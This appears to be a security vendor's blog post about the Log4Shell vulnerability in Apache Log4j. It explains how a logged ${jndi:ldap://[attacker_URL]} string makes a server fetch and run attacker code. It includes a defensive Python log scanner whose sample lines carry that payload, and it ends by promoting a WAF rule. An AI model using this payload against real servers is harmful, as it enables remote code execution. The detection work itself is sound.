On the 10th of December, bleepingcomputer.com reported an exploit for a critical zero-day vulnerability called "Log4Shell". The exploit targets Apache Log4j, the Java-based logging platform used to access web server and application logs.
About the vulnerability
To exploit this vulnerability, an attacker could set the user agent of a web browser to a string in the format ${jndi:ldap://[attacker_URL]} and access the website, or search the website for such a string. Either way, the string is added to the web server's access log.
When the Log4j application parses these logs and finds the string, the flaw forces the server to make a callback or request to the URL listed in the JNDI string. An attacker could use this URL to pass Base64-encoded commands or Java classes to execute on the vulnerable device.
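To check whether such strings have already reached an access log, the following added example (not code from BitNinja or from the original article) scans Combined Log Format lines for the lookup format described above, percent-decoding each field first because a searched string is logged URL-encoded. The log layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Assumed layout (Combined Log Format):
# ip - user [time] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# The lookup format described in the article: ${jndi:ldap://[attacker_URL]}
JNDI_RE = re.compile(r'\$\{jndi:(?P<scheme>[a-z]+)://(?P<target>[^}\s]*)\}?', re.I)


def decode(value, rounds=2):
    """Percent-decode up to `rounds` times; stop once nothing changes."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_access_log(lines):
    """Return one finding per log field that carries a JNDI lookup string."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not in the assumed format: skipped, not guessed at
        for field in ("request", "referer", "agent"):
            hit = JNDI_RE.search(decode(m.group(field)))
            if hit:
                findings.append({
                    "line": lineno, "client": m.group("ip"), "field": field,
                    "scheme": hit.group("scheme").lower(),
                    "callback": hit.group("target"),
                })
    return findings


# Constructed sample lines (documentation addresses, reserved hostnames).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:09:14:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example.invalid/a}"',
    '198.51.100.23 - - [10/Dec/2021:09:15:40 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example.invalid%2Fb%7D HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Dec/2021:09:16:11 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(*scan_access_log(SAMPLE_LOG), sep="\n")
```

A hit shows only that the string was logged; whether the server then made the callback has to be confirmed from outbound connection records.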
Solution by BitNinja
The threat management team of BitNinja found the solution quickly and created a WAF rule (Rule ID: 407002-407003) to defend your servers against the Log4j Log4Shell zero-day vulnerability. You don't have to do anything. Just sit back and relax. We are taking care of the safety of your servers.
Zero-day vulnerabilities are among the most dangerous threats out there. Cybersecurity is not optional anymore. It is a must!
If you haven’t tried BitNinja yet, don’t forget to register for the 7-day free trial! No credit card is needed!
Let’s make the Internet a safer place together!